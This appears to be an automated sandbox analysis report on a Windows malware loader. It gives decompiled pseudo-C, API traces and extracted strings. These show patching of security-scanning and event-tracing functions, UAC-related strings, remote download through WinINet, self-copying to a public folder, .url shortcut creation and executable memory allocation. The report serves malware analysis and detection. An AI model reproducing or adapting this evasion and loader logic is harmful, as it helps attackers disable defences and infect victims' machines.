0x0273ada3
0x0273ada8
0x0273adad
0x0273adb3
0x0273adc3
0x0273addb
0x0273ade6
0x0273aded
0x0273adf8
0x0273ae10
0x0273ae1b
0x0273ae1c
0x0273ae21
0x0273ae26
0x0273ae2c
0x0273ae3c
0x0273ae54
0x0273ae5f
0x0273ae66
0x0273ae71
0x0273ae89
0x0273ae94
0x0273ae95
0x0273ae9a
0x0273aea8
0x0273aeae
0x0273aeb3
0x0273aeb9
0x0273aec9
0x0273aee1
0x0273aeec
0x0273aef3
0x0273aefe
0x0273af16
0x0273af21
0x0273af22
0x0273af27
0x0273af2c
0x0273af32
0x0273af42
0x0273af5a
0x0273af65
0x0273af6c
0x0273af77
0x0273af8f
0x0273af9a
0x0273af9b
0x0273afa0
0x0273afa5
0x0273afab
0x0273afbb
0x0273afd3
0x0273afde
0x0273afe5
0x0273aff0
0x0273b008
0x0273b013
0x0273b014
0x0273b019
0x0273b02b
0x0273b036
0x0273b03b
0x0273b03b
0x0273b040
0x0273b045
0x0273b04b
0x0273b05b
0x0273b073
0x0273b07e
0x0273b085
0x0273b090
0x0273b0a8
0x0273b0b3
0x0273b0b4
0x0273b0b9
0x0273b0be
0x0273b0c4
0x0273b0d4
0x0273b0ec
0x0273b0f7
0x0273b0fe
0x0273b109
0x0273b121
0x0273b12c
0x0273b12d
0x0273b132
0x0273b137
0x0273b13d
0x0273b14d
0x0273b165
0x0273b170
0x0273b177
0x0273b182
0x0273b19a
0x0273b1a5
0x0273b1a6
0x0273b1ab
0x0273b1b0
0x0273b1b6
0x0273b1c6
0x0273b1de
0x0273b1e9
0x0273b1f0
0x0273b1fb
0x0273b213
0x0273b21e
0x0273b21f
0x0273b224
0x0273b22a
0x0273b22f
0x0273b235
0x0273b245
0x0273b25c
0x0273b261
0x0273b266
0x0273b26c
0x0273b27c
0x0273b294
0x0273b29f
0x0273b2a6
0x0273b2b1
0x0273b2c9
0x0273b2d4
0x0273b2d5
0x0273b2da
0x0273b2df
0x0273b2e5
0x0273b2f5
0x0273b30d
0x0273b318
0x0273b31f
0x0273b32a
0x0273b342
0x0273b34d
0x0273b34e
0x0273b355
0x0273b35a
0x0273b368
0x0273b379
0x0273b389
0x0273b394
0x0273b3a0
0x0273b3ab
0x0273b3ac
0x0273b3b1
0x0273b3b6
0x0273b3bc
0x0273b3cc
0x0273b3e4
0x0273b3ef
0x0273b3f6
0x0273b401
0x0273b419
0x0273b424
0x0273b425
0x0273b42a
0x0273b42f
0x0273b435
0x0273b445
0x0273b45d
0x0273b468
0x0273b46f
0x0273b47a
0x0273b492
0x0273b49d
0x0273b49e
0x0273b4b4
0x0273b4b9
0x0273b4c9
0x0273b4ce
0x0273b4d3
0x0273b4d9
0x0273b4e9
0x0273b501
0x0273b50c
0x0273b513
0x0273b51e
0x0273b536
0x0273b541
0x0273b542
0x0273b547
0x0273b54c
0x0273b552
0x0273b562
0x0273b57a
0x0273b585
0x0273b58c
0x0273b597
0x0273b5af
0x0273b5ba
0x0273b5bb
0x0273b5cc
0x0273b5d3
0x0273b5d4
0x0273b5d9
0x0273b5dc
0x0273b5df
0x0273b5e4
0x0273b5ea
0x0273b5fa
0x0273b612
0x0273b61d
0x0273b624
0x0273b62f
0x0273b647
0x0273b652
0x0273b653
0x0273b658
0x0273b65d
0x0273b663
0x0273b673
0x0273b68b
0x0273b696
0x0273b69d
0x0273b6a8
0x0273b6c0
0x0273b6cb
0x0273b6cc
0x0273b6d6
0x0273b6dd
0x0273b6fb
0x0273b706
0x0273b70d
0x0273b715
0x0273b723
0x0273b739
0x0273b744
0x0273b74b
0x0273b753
0x0273b75f
0x0273b775
0x0273b780
0x0273b787
0x0273b79b
0x0273b7a0
0x0273b7bb
0x0273b7d3
0x0273b7de
0x0273b7e5
0x0273b7ea
0x0273b7ed
0x0273b7f0
0x0273b7f5
0x0273b7ff
0x0273b7ff
0x0273aa94
0x0273aa33
0x02739130
0x02739130
0x02739132
0x02739134
0x02739135
0x00000000
0x02739137
0x02739137
0x02739140
0x02739141
0x02739146
0x02739149
0x0273914c
0x02739156
0x0273915b
0x0273915c
0x02739163
0x0273917b
0x02739180
0x02739181
0x02739186
0x02739188
0x027391a5
0x0273918a
0x02739194
0x02739194
0x02739165
0x0273916f
0x0273916f
0x02739163
0x00000000

APIs

InetIsOffline.URL(00000000,00000000,0273E742,?,?,?,00000000,00000000), ref: 0273915C
InetIsOffline.URL(00000000,00000000,00000000,0273E742,?,?,?,00000000,00000000), ref: 02739181

Part of subcall function 02733690: LoadLibraryA.KERNEL32(00000000,00000000,02733766), ref: 027336CA
Part of subcall function 02733690: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02733766), ref: 027336D4
Part of subcall function 02733690: GetProcAddress.KERNEL32(77880000,00000000), ref: 027336FD
Part of subcall function 02733690: RtlMoveMemory.N(027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273371E
Part of subcall function 02733690: GetCurrentProcess.KERNEL32(027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 02733735
Part of subcall function 02733690: NtFlushVirtualMemory.N(00000000,027442FC,00000004,00000000,027442FC,02726A20,00000004,77880000,00000000,00000000,00000000,00000000,02733766), ref: 0273373B
Part of subcall function 02733690: FreeLibrary.KERNEL32(77880000,00000000,00000000,00000000,02733766), ref: 02733746

Part of subcall function 027280F8: GetFileAttributesA.KERNEL32(00000000,?,02739493,ScanString,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,Initialize,0273E77C,ScanString,0273E77C,OpenSession), ref: 02728103

Part of subcall function 027234CC: GetFileSize.KERNEL32(0001D7B0,00000000,02744B88,?,02739B35,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,027449C4,ScanBuffer,0273E77C), ref: 027234E8

Part of subcall function 02738CBC: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02738D00
Part of subcall function 02738CBC: InternetOpenUrlA.WININET(00CC0004,00000000,00000000,00000000,00000000,00000000), ref: 02738D3B
Part of subcall function 02738CBC: InternetReadFile.WININET(00CC000C,027445B8,00000401,027449BC), ref: 02738D71
Part of subcall function 02738CBC: InternetCloseHandle.WININET(00CC000C), ref: 02738DB4

Part of subcall function 0272811C: GetFileAttributesA.KERNEL32(00000000,?,0273A7E7,ScanString,0273E77C,OpenSession,0273E77C,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanString,0273E77C,OpenSession), ref: 02728127

Part of subcall function 027282B0: CreateDirectoryA.KERNEL32(00000000,00000000,?,0273A80D,ScanString,0273E77C,OpenSession,0273E77C,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanString,0273E77C), ref: 027282BD

Part of subcall function 027389A4: _lcreat.KERNEL32(00000000,00000000), ref: 027389DB
Part of subcall function 027389A4: _lwrite.KERNEL32(00000000,00000000,?,00000000,02738A21), ref: 027389FB
Part of subcall function 027389A4: _lclose.KERNEL32(00000000), ref: 02738A01

Part of subcall function 02722FC4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,02744B88,?,02739AFF,ScanBuffer,0273E77C,OpenSession,0273E77C,Initialize,0273E77C,ScanBuffer,0273E77C,027449C4), ref: 02722FE8

CopyFileA.KERNEL32(00000000,00000000,000000FF), ref: 0273B379

Strings

SetEncryptedFileMetadata, xrefs: 0273E075
NtSetSecurityObject, xrefs: 0273E398
KernelBase, xrefs: 0273DD34, 0273DD67
ReportEventA, xrefs: 0273E042
UacInitialize, xrefs: 0273DE01
InternetOpena, xrefs: 02739E12
[InternetShortcut], xrefs: 0273B6D1
NtPrivilegeCheck, xrefs: 0273E35E
OpenSession, xrefs: 027391B5, 0273939A, 027395A6, 02739804, 02739A03, 02739BC1, 02739C49, 02739EE3, 02739FD5, 0273A0C7, 0273A241, 0273A373, 0273A5DD, 0273A6CF, 0273A93D, 0273AB97, 0273ADB3, 0273AF32, 0273B13D, 0273B3BC, 0273B4D9, 0273B9FF, 0273BB17, 0273BC35, 0273BD58, 0273BF46, 0273CE6F, 0273CFA0, 0273D0C5, 0273D1DE, 0273D2E7, 0273D3E4, 0273D574, 0273D705, 0273D973, 0273DAD8, 0273DCA9, 0273DD88
C:\Windows\SysWOW64, xrefs: 0273BF1E
kernelbase, xrefs: 0273DFAD
CopyFileA, xrefs: 0273B384
LdrQueryProcessModuleInformation, xrefs: 0273E1C8
ScanString, xrefs: 02739216, 02739422, 027394A2, 0273951E, 02739CEE, 0273A140, 0273A40C, 0273A748, 0273A9B6, 0273AC10, 0273AE2C, 0273B1B6, 0273B2E5, 0273B663, 0273BA78, 0273BE4A, 0273D77E, 0273D8FA, 0273DBCA, 0273DEF3, 0273E0E0, 0273E411
NtOpenFile, xrefs: 0273E5A7
NtOpenObjectAuditAlarm, xrefs: 0273E23C
.url, xrefs: 0273AA5A, 0273B7AB
http, xrefs: 02739DD5
IconIndex=, xrefs: 0273B734
NtCreateFile, xrefs: 0273E533
NtPrivilegedServiceAuditAlarm, xrefs: 0273E18E
ReportEventW, xrefs: 0273E0A8
NtAllocateUuids, xrefs: 0273E324
NtCreateSection, xrefs: 0273E485
NtAccessCheckAndAuditAlarm, xrefs: 0273E2B0
EtwEventWrite, xrefs: 0273E5E1
advapi32, xrefs: 0273E059, 0273E08C, 0273E0BF
EtwEventWriteEx, xrefs: 0273E56D
wininet, xrefs: 02739E29, 02739E5C, 02739E8F, 02739EC2
ScanBuffer, xrefs: 027392D8, 0273961F, 027396E8, 0273987D, 02739A7C, 02739F5C, 0273A1C8, 0273A2CE, 0273A656, 0273A8C4, 0273AB1E, 0273AD3A, 0273AFAB, 0273B0C4, 0273B26C, 0273B435, 0273B552, 0273B986, 0273BB90, 0273BCAE, 0273BDD1, 0273BFBF, 0273CDF6, 0273CF27, 0273D04C, 0273D165, 0273D26E, 0273D36B, 0273D45D, 0273D4FB, 0273D608, 0273D68C, 0273D85B, 0273DA50
LdrGetDllHandle, xrefs: 0273E154
VirtualProtect, xrefs: 0273DC3E, 0273DD1D
NtPrivilegeObjectAuditAlarm, xrefs: 0273E276
kernel32, xrefs: 0273B39B, 0273DC55, 0273DC88
UacScan, xrefs: 02739D67, 0273DE7A, 0273DFCE
Initialize, xrefs: 02739277, 02739339, 0273978B, 0273998A, 0273A04E, 0273A564, 0273A84B, 0273AAA5, 0273ACC1, 0273AEB9, 0273B04B, 0273B5EA, 0273B90D, 0273DB51
NtAccessCheck, xrefs: 0273E2EA
197, xrefs: 02739CB7, 0273A1B3
InternetReadFile, xrefs: 02739E78
^^Nc, xrefs: 02739B94
URL=file:", xrefs: 0273B6E0
CreateRemoteThreadEx , xrefs: 0273DF96
NtMapViewOfSection, xrefs: 0273E4F9
NtQuerySecurityObject, xrefs: 0273E3D2
C:\Windows\System32\, xrefs: 02739481, 0273D01C
ntdll, xrefs: 0273DF86
VirtualAlloc, xrefs: 0273DC71, 0273DD50
NtOpenSection, xrefs: 0273E4BF
iexpress.exe, xrefs: 02739591
HotKey=, xrefs: 0273B770
InternetOpenUrl, xrefs: 02739E45
.exe, xrefs: 0273B235
C:\Users\Public\Libraries, xrefs: 0273A7BB
Null, xrefs: 0273BED8, 0273C07D
InternetCloseHandle, xrefs: 02739EAB
5E5CDDEE, xrefs: 0273916A, 0273918F, 0273D4E4, 0273D844, 0273DA39, 0273DF75
LdrLoadDll, xrefs: 0273E202

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: File$Internet$AttributesHandleInetLibraryMemoryModuleOfflineOpen$AddressCloseCopyCreateCurrentDirectoryFlushFreeLoadMoveNameProcProcessReadSizeVirtual_lclose_lcreat_lwrite
String ID: .exe$.url$197$5E5CDDEE$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$CopyFileA$CreateRemoteThreadEx $EtwEventWrite$EtwEventWriteEx$HotKey=$IconIndex=$Initialize$InternetCloseHandle$InternetOpenUrl$InternetOpena$InternetReadFile$KernelBase$LdrGetDllHandle$LdrLoadDll$LdrQueryProcessModuleInformation$NtAccessCheck$NtAccessCheckAndAuditAlarm$NtAllocateUuids$NtCreateFile$NtCreateSection$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenSection$NtPrivilegeCheck$NtPrivilegeObjectAuditAlarm$NtPrivilegedServiceAuditAlarm$NtQuerySecurityObject$NtSetSecurityObject$Null$OpenSession$ReportEventA$ReportEventW$ScanBuffer$ScanString$SetEncryptedFileMetadata$URL=file:"$UacInitialize$UacScan$VirtualAlloc$VirtualProtect$[InternetShortcut]$^^Nc$advapi32$http$iexpress.exe$kernel32$kernelbase$ntdll$wininet
API String ID: 1007107856-3759982345
Opcode ID: bf5bc667b59eb7df36c3f3e0faae5c185e6bc41600ec51f8216b452285a22911
Instruction ID: 4f8464b78228c656c86f2f5fe15e93f3dfd280ed93f37ec938842f0d509b02a0
Opcode Fuzzy Hash: bf5bc667b59eb7df36c3f3e0faae5c185e6bc41600ec51f8216b452285a22911
Instruction Fuzzy Hash: 3883FF39A405699BDB23EB64DCA4BDE73F6AF48300F1084E6D105A7605DF30AE89DF58

Uniqueness

Uniqueness Score: -1.00%

Function 02725D0C Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E02725D0C(CHAR* __eax) {
				CHAR* _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t74;
				CHAR* _t99;
				CHAR* _t100;
				intOrPtr _t104;
				struct HINSTANCE__* _t112;
				void* _t115;
				void* _t117;
				intOrPtr _t118;

				_t115 = _t117;
				_t118 = _t117 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t115);
					_push(0x2725e11);
					_push( *[fs:eax]);
					 *[fs:eax] = _t118;
					_v28 = 5;
					E02725B48( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E02725F78, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t104);
					 *[fs:eax] = _t104;
					_push(E02725E18);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							lstrcpynA( &_v289, _v8, 0x105);
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
							_t112 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t99 =  &(( &_v289)[lstrlenA( &_v289)]);
								while( *_t99 != 0x2e && _t99 !=  &_v289) {
									_t99 = _t99 - 1;
								}
								_t74 =  &_v289;
								if(_t99 != _t74) {
									_t100 =  &(_t99[1]);
									if(_v22 != 0) {
										lstrcpynA(_t100,  &_v22, 0x105 - _t100 - _t74);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t112 == 0 && _v17 != 0) {
										lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
										_t112 = LoadLibraryExA( &_v289, 0, 2);
										if(_t112 == 0) {
											_v15 = 0;
											lstrcpynA(_t100,  &_v17, 0x105 - _t100 -  &_v289);
											_t112 = LoadLibraryExA( &_v289, 0, 2);
										}
									}
								}
							}
							return _t112;
						} else {
							goto L3;
						}
					}
				}
			}

0x02725d0d
0x02725d0f
0x02725d17
0x02725d28
0x02725d2d
0x02725d46
0x02725d4d
0x02725d8f
0x02725d91
0x02725d92
0x02725d97
0x02725d9a
0x02725d9d
0x02725daf
0x02725dd2
0x02725df2
0x02725df2
0x02725df6
0x02725dfc
0x02725dff
0x02725e02
0x02725e10
0x02725d4f
0x02725d64
0x02725d6b
0x00000000
0x02725d6d
0x02725d82
0x02725d89
0x02725e28
0x02725e3b
0x02725e40
0x02725e49
0x02725e73
0x02725e78
0x02725e77
0x02725e77
0x02725e87
0x02725e8f
0x02725e95
0x02725e9a
0x02725ead
0x02725ec2
0x02725ec2
0x02725ec6
0x02725ee5
0x02725efa
0x02725efe
0x02725f00
0x02725f1b
0x02725f30
0x02725f30
0x02725efe
0x02725ec6
0x02725e8f
0x02725f39
0x00000000
0x00000000
0x00000000
0x02725d89
0x02725d6b

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02720000,027407B4), ref: 02725D28
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02720000,027407B4), ref: 02725D46
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02720000,027407B4), ref: 02725D64
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02725D82
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02725E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02725DCB
RegQueryValueExA.ADVAPI32(?,02725F78,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02725E11,?,80000001), ref: 02725DE9
RegCloseKey.ADVAPI32(?,02725E18,00000000,?,?,00000000,02725E11,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02725E0B
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02725E28
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02725E35
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02725E3B
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02725E66
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02725EAD
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02725EBD
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02725EE5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02725EF5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02725F1B
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02725F2B

Strings

Software\Borland\Delphi\Locales, xrefs: 02725D78
Software\Borland\Locales, xrefs: 02725D3C, 02725D5A

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 10620ea3797fa8043859f4b18a3988767a348311742e4be13802134e1fd4c7d7
Instruction ID: 076ca584c1ff407c2fecbb7cedea42ee693e85760159523facc89614447f60a3
Opcode Fuzzy Hash: 10620ea3797fa8043859f4b18a3988767a348311742e4be13802134e1fd4c7d7
Instruction Fuzzy Hash: 75513F71E4026C7AFB26D6A48C8AFEF7BEDDB05744F8001A5F604E6181E7749A488F60

Uniqueness

Uniqueness Score: -1.00%

Function 02736388 Relevance: 32.7, APIs: 11, Strings: 7, Instructions: 1151
memorylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 48%

			E02736388(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				char _v176;
				char _v180;
				intOrPtr _v184;
				char _v188;
				char _v192;
				char _v196;
				intOrPtr _v200;
				char _v204;
				char _v208;
				char _v212;
				intOrPtr _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v232;
				char _v236;
				char _v240;
				char _v244;
				intOrPtr _v248;
				char _v252;
				char _v256;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v272;
				char _v276;
				intOrPtr _v280;
				char _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				char _v300;
				char _v304;
				char _v308;
				intOrPtr _v312;
				char _v316;
				char _v320;
				char _v324;
				intOrPtr _v328;
				char _v332;
				char _v336;
				char _v340;
				intOrPtr _v344;
				char _v348;
				char _v352;
				char _v356;
				intOrPtr _v360;
				char _v364;
				char _v368;
				char _v372;
				intOrPtr _v376;
				char _v380;
				char _v384;
				char _v388;
				intOrPtr _v392;
				char _v396;
				char _v400;
				char _v404;
				intOrPtr _v408;
				char _v412;
				char _v416;
				char _v420;
				intOrPtr _v424;
				char _v428;
				char _v432;
				char _v436;
				intOrPtr _v440;
				char _v444;
				char _v448;
				char _v452;
				intOrPtr _v456;
				char _v460;
				char _v464;
				char _v468;
				intOrPtr _v472;
				char _v476;
				char _v480;
				char _v484;
				intOrPtr _v488;
				char _v492;
				char _v496;
				char _v500;
				intOrPtr _v504;
				char _v508;
				char _v512;
				char _v516;
				intOrPtr _v520;
				char _v524;
				char _v528;
				char _v532;
				intOrPtr _v536;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				char _v556;
				char _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				void* __ecx;
				void* _t347;
				intOrPtr _t410;
				intOrPtr _t412;
				void* _t415;
				intOrPtr _t430;
				struct HINSTANCE__* _t462;
				struct HINSTANCE__* _t463;
				struct HINSTANCE__* _t465;
				intOrPtr _t467;
				void* _t469;
				void* _t470;
				intOrPtr _t485;
				struct HINSTANCE__* _t517;
				intOrPtr _t519;
				void* _t521;
				intOrPtr _t551;
				intOrPtr _t582;
				intOrPtr _t597;
				intOrPtr _t614;
				void* _t631;
				intOrPtr _t646;
				intOrPtr _t664;
				intOrPtr _t679;
				intOrPtr _t711;
				intOrPtr _t740;
				signed int _t777;
				long _t779;
				signed int _t781;
				signed int _t784;
				struct HINSTANCE__* _t788;
				intOrPtr _t790;
				signed int _t837;
				long _t839;
				long _t868;
				signed int _t870;
				void* _t873;
				void* _t874;
				signed int _t905;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				intOrPtr _t945;
				intOrPtr _t973;
				signed int _t987;
				void* _t995;
				void* _t1000;
				void* _t1006;
				void* _t1011;
				void* _t1016;
				void* _t1017;
				void* _t1023;
				void* _t1028;
				void* _t1035;
				void* _t1036;
				void* _t1041;
				void* _t1046;
				void* _t1051;
				void* _t1056;
				intOrPtr _t1057;
				void* _t1063;
				void* _t1068;
				void* _t1073;
				void* _t1078;
				void* _t1083;
				void* _t1088;
				void* _t1093;
				void* _t1099;
				void* _t1104;
				void* _t1109;
				void* _t1114;
				void* _t1119;
				intOrPtr _t1121;
				void* _t1128;
				void* _t1133;
				intOrPtr _t1134;
				intOrPtr _t1135;
				intOrPtr _t1136;
				void* _t1141;
				void* _t1146;
				void* _t1151;
				intOrPtr _t1152;
				intOrPtr _t1154;
				void* _t1159;
				void* _t1164;
				intOrPtr _t1165;
				long _t1166;
				void* _t1171;
				void* _t1176;
				intOrPtr _t1177;
				void* _t1178;
				void* _t1183;
				void* _t1188;
				void* _t1194;
				void* _t1196;
				void* _t1197;
				void* _t1198;
				intOrPtr _t1200;
				intOrPtr _t1201;
				void* _t1208;

				_t1192 = __esi;
				_t1200 = _t1201;
				_t945 = 0x47;
				do {
					_push(0);
					_push(0);
					_t945 = _t945 - 1;
				} while (_t945 != 0);
				_t1 =  &_v8;
				 *_t1 = _t945;
				_push(__ebx);
				_push(__esi);
				_v12 =  *_t1;
				_v8 = __eax;
				_push(_t1200);
				_push(0x273768e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1201;
				_t347 = E0272304C(0x270e);
				_push(_t347);
				L027358FC();
				if(_t347 == 0) {
					E027248F4(0x2744598, 0x27376b8);
				} else {
					E027248F4(0x2744598, 0x27376a8);
				}
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v16, E02724D64(_v20));
				_push(_v16);
				E02724BB0( &_v28,  *0x2744598, 0x27376c4);
				E02724A98( &_v24, E02724D64(_v28));
				_pop(_t995); // executed
				E02733690(_v24, 0x2744598, _t995, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v32, E02724D64(_v36));
				_push(_v32);
				E02724BB0( &_v44,  *0x2744598, 0x27376c4);
				E02724A98( &_v40, E02724D64(_v44));
				_pop(_t1000); // executed
				E02733690(_v40, 0x2744598, _t1000, _t1192); // executed
				_push(0);
				_push(_v12);
				asm("cdq");
				asm("adc edx, [esp+0x4]");
				 *0x274451c =  *((intOrPtr*)(_v12 + 0x3c)) + _v76;
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v48, E02724D64(_v52));
				_push(_v48);
				E02724BB0( &_v60,  *0x2744598, 0x27376c4);
				E02724A98( &_v56, E02724D64(_v60));
				_pop(_t1006); // executed
				E02733690(_v56, 0x2744598, _t1006, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v64, E02724D64(_v68));
				_push(_v64);
				E02724BB0( &_v76,  *0x2744598, 0x27376c4);
				E02724A98( &_v72, E02724D64(_v76));
				_pop(_t1011); // executed
				E02733690(_v72, 0x2744598, _t1011, _t1192); // executed
				_t410 =  *0x274451c; // 0x4984ba8
				_t40 = _t410 + 0x50; // 0x2f000
				_t412 =  *0x274451c; // 0x4984ba8
				_t41 = _t412 + 0x34; // 0x400000
				_t415 = VirtualAlloc( *_t41 +  *0x2744524,  *_t40, 0x3000, 0x40); // executed
				 *0x2744538 = _t415;
				_push(0x27376c4);
				_push( *0x2744598);
				_push("UacScan");
				E02724C24();
				E02724A98( &_v80, E02724D64(_v84));
				_push(_v80);
				E02724BB0( &_v92,  *0x2744598, 0x27376c4);
				E02724A98( &_v88, E02724D64(_v92));
				_pop(_t1016); // executed
				E02733690(_v88, 0x2744598, _t1016, _t1192);
				_t430 =  *0x274451c; // 0x4984ba8
				_t1017 =  *0x2744538; // 0x10410000
				_t50 = _t430 + 0x34; // 0x400000
				 *0x274453c = _t1017 -  *_t50;
				_push(0x27376c4);
				_push( *0x2744598);
				_push("OpenSession");
				E02724C24();
				E02724A98( &_v96, E02724D64(_v100));
				_push(_v96);
				E02724BB0( &_v108,  *0x2744598, 0x27376c4);
				E02724A98( &_v104, E02724D64(_v108));
				_pop(_t1023); // executed
				E02733690(_v104, 0x2744598, _t1023, _t1192); // executed
				_push(0x27376c4);
				_push( *0x2744598);
				_push("ScanBuffer");
				E02724C24();
				E02724A98( &_v112, E02724D64(_v116));
				_push(_v112);
				E02724BB0( &_v124,  *0x2744598, 0x27376c4);
				E02724A98( &_v120, E02724D64(_v124));
